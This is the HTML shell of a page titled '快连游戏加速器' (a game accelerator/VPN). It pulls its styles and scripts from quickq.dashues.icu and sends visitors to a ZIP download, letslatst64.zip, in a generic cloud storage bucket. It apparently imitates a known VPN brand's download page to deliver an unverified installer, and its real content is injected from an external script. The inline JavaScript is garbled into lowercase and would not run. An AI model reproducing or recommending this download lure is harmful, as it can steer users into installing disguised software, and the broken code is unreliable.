<!doctype html>
<html class="no-js" lang="">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no,user-scalable=no">
<title>快连游戏加速器</title>
<meta name="facebook-domain-verification" content="7v7k0k8fp58yi60sxawv2yje52q4mx">
<meta name="format-detection" content="telephone=no">
<meta name="format-detection" content="email=no">
<meta name="google" content="notranslate">
<link rel="shortcut icon" href="https://quickq.dashues.icu/index_files/favicon.ico">
<link href="https://quickq.dashues.icu/index_files/bootstrap.min.css" rel="stylesheet">
<link href="https://quickq.dashues.icu/index_files/font.css" rel="stylesheet">
<link href="https://quickq.dashues.icu/index_files/public.css" rel="stylesheet">
<link href="https://quickq.dashues.icu/index_files/footer_modal.css" rel="stylesheet">
<link href="https://quickq.dashues.icu/index_files/index.css" rel="stylesheet">
<script src="https://quickq.dashues.icu/index_files/jquery-2.1.4.js"></script> 
<script src="https://quickq.dashues.icu/index_files/filename.js"></script>
<script>
var downloadconfig = {
    downloadurl: "https://windowsw.oss-cn-hongkong.aliyuncs.com/letslatst64.zip"
};

function down() {
    window.location.href = downloadconfig.downloadurl;
    return false;
}
</script>
</head>
<body>
<div id="app-container"></div>
<script src="https://quickq.dashues.icu/index.js"></script>
<script>
 document.addeventlistener('domcontentloaded', function() {
 
     if (typeof appendhtml === 'function') {
        appendhtml();
    } else if (typeof htmlcontent !== 'undefined') {
        document.getelementbyid('app-container').innerhtml = htmlcontent;
    }
});
</script>
</body>
</html>
